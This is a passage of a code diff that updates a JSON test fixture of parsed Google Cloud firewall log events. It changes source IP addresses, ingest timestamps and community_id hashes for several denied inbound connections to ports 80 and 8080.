+445,7 @@ }, "related": { "ip": [ - "192.0.2.219", + "192.168.2.219", "10.28.0.16" ] }, 
@@ -497,8 +486,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147384600Z", - "original": "{\"insertId\":\"8vcfeailjd\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.219\",\"src_port\":2897},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Krasnodar\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Krasnodar Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:31:22.738796433Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:31:19.421478847Z\"}", + "ingested": "2021-12-09T13:37:43.705417200Z", + "original": "{\"insertId\":\"8vcfeailjd\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.219\",\"src_port\":2897},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Krasnodar\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Krasnodar 
Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:31:22.738796433Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:31:19.421478847Z\"}", "kind": "event", "action": "firewall-rule", "id": "8vcfeailjd", @@ -524,16 +513,16 @@ "continent_name": "Europe", "country_name": "deu" }, - "address": "192.0.2.14", + "address": "192.168.2.14", "port": 61000, - "ip": "192.0.2.14" + "ip": "192.168.2.14" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=", + "community_id": "1:oI8iImLuHWwNxzRIIpsZbSUF2fE=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -552,7 +541,7 @@ }, "related": { "ip": [ - "192.0.2.14", + "192.168.2.14", "10.28.0.16" ] }, 
@@ -593,8 +582,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147388800Z", - "original": "{\"insertId\":\"1bqgmw9feiabij\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:35.727004321Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:31.079508196Z\"}", + "ingested": "2021-12-09T13:37:43.705423Z", + "original": 
"{\"insertId\":\"1bqgmw9feiabij\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:35.727004321Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:31.079508196Z\"}", "kind": "event", "action": "firewall-rule", "id": "1bqgmw9feiabij", @@ -620,16 +609,16 @@ "continent_name": "Europe", "country_name": "deu" }, - "address": "192.0.2.14", + "address": "192.168.2.14", "port": 61000, - "ip": "192.0.2.14" + "ip": "192.168.2.14" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=", + "community_id": "1:oI8iImLuHWwNxzRIIpsZbSUF2fE=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -648,7 +637,7 @@ }, "related": { "ip": [ - "192.0.2.14", + "192.168.2.14", "10.28.0.16" ] }, 
@@ -689,8 +678,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147392800Z", - "original": "{\"insertId\":\"1jrxaqbfe48bir\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:40.791816098Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:34.190831607Z\"}", + "ingested": "2021-12-09T13:37:43.705428700Z", + "original": 
"{\"insertId\":\"1jrxaqbfe48bir\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:40.791816098Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:34.190831607Z\"}", "kind": "event", "action": "firewall-rule", "id": "1jrxaqbfe48bir", @@ -718,16 +707,16 @@ "city_name": "Berdychiv", "region_name": "Zhytomyr Oblast" }, - "address": "192.0.2.151", + "address": "192.168.2.151", "port": 62551, - "ip": "192.0.2.151" + "ip": "192.168.2.151" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:Us40G9GKff9nidizV7rCFgCQb9E=", + "community_id": "1:SKVztg1DPAOr3jK41SNPB1GNIVg=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -746,7 +735,7 @@ }, "related": { "ip": [ - "192.0.2.151", + "192.168.2.151", "10.28.0.16" ] }, 
@@ -787,8 +776,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147396400Z", - "original": "{\"insertId\":\"1fw7drlfe2ty27\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.151\",\"src_port\":62551},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Berdychiv\",\"continent\":\"Europe\",\"country\":\"ukr\",\"region\":\"Zhytomyr Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:48:47.038820509Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:48:41.449552758Z\"}", + "ingested": "2021-12-09T13:37:43.705434Z", + "original": "{\"insertId\":\"1fw7drlfe2ty27\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.151\",\"src_port\":62551},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Berdychiv\",\"continent\":\"Europe\",\"country\":\"ukr\",\"region\":\"Zhytomyr 
Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:48:47.038820509Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:48:41.449552758Z\"}", "kind": "event", "action": "firewall-rule", "id": "1fw7drlfe2ty27", @@ -816,16 +805,16 @@ "city_name": "Vicenza", "region_name": "Veneto" }, - "address": "192.0.2.241", + "address": "192.168.2.241", "port": 44542, - "ip": "192.0.2.241" + "ip": "192.168.2.241" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:CKIvQ4W48ZjqiomnWxipDck9Yb0=", + "community_id": "1:Ju3t0rAM8ZPZaqr/NXVTm2rCcOQ=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -844,7 +833,7 @@ }, "related": { "ip": [ - "192.0.2.241", + "192.168.2.241", "10.28.0.16" ] }, 
@@ -885,8 +874,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147422700Z", - "original": "{\"insertId\":\"1yre751fekaxzs\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.241\",\"src_port\":44542},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Vicenza\",\"continent\":\"Europe\",\"country\":\"ita\",\"region\":\"Veneto\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:10:30.804549999Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:10:24.214995318Z\"}", + "ingested": "2021-12-09T13:37:43.705438700Z", + "original": 
"{\"insertId\":\"1yre751fekaxzs\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.241\",\"src_port\":44542},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Vicenza\",\"continent\":\"Europe\",\"country\":\"ita\",\"region\":\"Veneto\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:10:30.804549999Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:10:24.214995318Z\"}", "kind": "event", "action": "firewall-rule", "id": "1yre751fekaxzs", @@ -914,16 +903,16 @@ "city_name": "Tula", "region_name": "Tula Oblast" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 41293, - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:4MspX9JxDXjbalHc/6y9GntbkUc=", + "community_id": "1:3p2S4HNdJf2gfA2403VPmsMxi5E=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -942,7 +931,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.28.0.16" ] }, 
@@ -983,8 +972,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147428700Z", - "original": "{\"insertId\":\"5kanfzfiqepkh\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":41293},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Tula\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Tula Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:35:28.934918322Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:35:23.504719962Z\"}", + "ingested": "2021-12-09T13:37:43.705444400Z", + "original": "{\"insertId\":\"5kanfzfiqepkh\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":41293},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Tula\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Tula 
Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:35:28.934918322Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:35:23.504719962Z\"}", "kind": "event", "action": "firewall-rule", "id": "5kanfzfiqepkh", @@ -1012,16 +1001,16 @@ "city_name": "Stavropol", "region_name": "Stavropol Krai" }, - "address": "192.0.2.251", + "address": "192.168.2.251", "port": 59106, - "ip": "192.0.2.251" + "ip": "192.168.2.251" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:KygoHJBT+06I9CnmAPRmvl5CRO4=", + "community_id": "1:TLgRm8s0Er+HDrnrkeenWw+/I0g=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1040,7 +1029,7 @@ }, "related": { "ip": [ - "192.0.2.251", + "192.168.2.251", "10.28.0.16" ] }, 
@@ -1081,8 +1070,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147433Z", - "original": "{\"insertId\":\"59z0t8fiow9vg\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.251\",\"src_port\":59106},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Stavropol\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Stavropol Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:36:54.238077643Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:36:52.135887769Z\"}", + "ingested": "2021-12-09T13:37:43.705448500Z", + "original": "{\"insertId\":\"59z0t8fiow9vg\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.251\",\"src_port\":59106},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Stavropol\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Stavropol 
Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:36:54.238077643Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:36:52.135887769Z\"}", "kind": "event", "action": "firewall-rule", "id": "59z0t8fiow9vg", @@ -1110,16 +1099,16 @@ "city_name": "Violès", "region_name": "Provence-Alpes-Côte d'Azur" }, - "address": "192.0.2.189", + "address": "192.168.2.189", "port": 61000, - "ip": "192.0.2.189" + "ip": "192.168.2.189" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=", + "community_id": "1:fazVU7VcvYIcDuTD7cy31u/SVLg=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1138,7 +1127,7 @@ }, "related": { "ip": [ - "192.0.2.189", + "192.168.2.189", "10.28.0.16" ] }, 
@@ -1179,8 +1168,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147437400Z", - "original": "{\"insertId\":\"1y7e4yzff816cq\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:26.357446279Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:16.59353182Z\"}", + "ingested": "2021-12-09T13:37:43.705453300Z", + "original": "{\"insertId\":\"1y7e4yzff816cq\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte 
d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:26.357446279Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:16.59353182Z\"}", "kind": "event", "action": "firewall-rule", "id": "1y7e4yzff816cq", @@ -1208,16 +1197,16 @@ "city_name": "Violès", "region_name": "Provence-Alpes-Côte d'Azur" }, - "address": "192.0.2.189", + "address": "192.168.2.189", "port": 61000, - "ip": "192.0.2.189" + "ip": "192.168.2.189" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=", + "community_id": "1:fazVU7VcvYIcDuTD7cy31u/SVLg=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1236,7 +1225,7 @@ }, "related": { "ip": [ - "192.0.2.189", + "192.168.2.189", "10.28.0.16" ] }, 
@@ -1277,8 +1266,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147441400Z", - "original": "{\"insertId\":\"lx5jlsfggpr0q\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:28.203068653Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:22.930570324Z\"}", + "ingested": "2021-12-09T13:37:43.705459100Z", + "original": 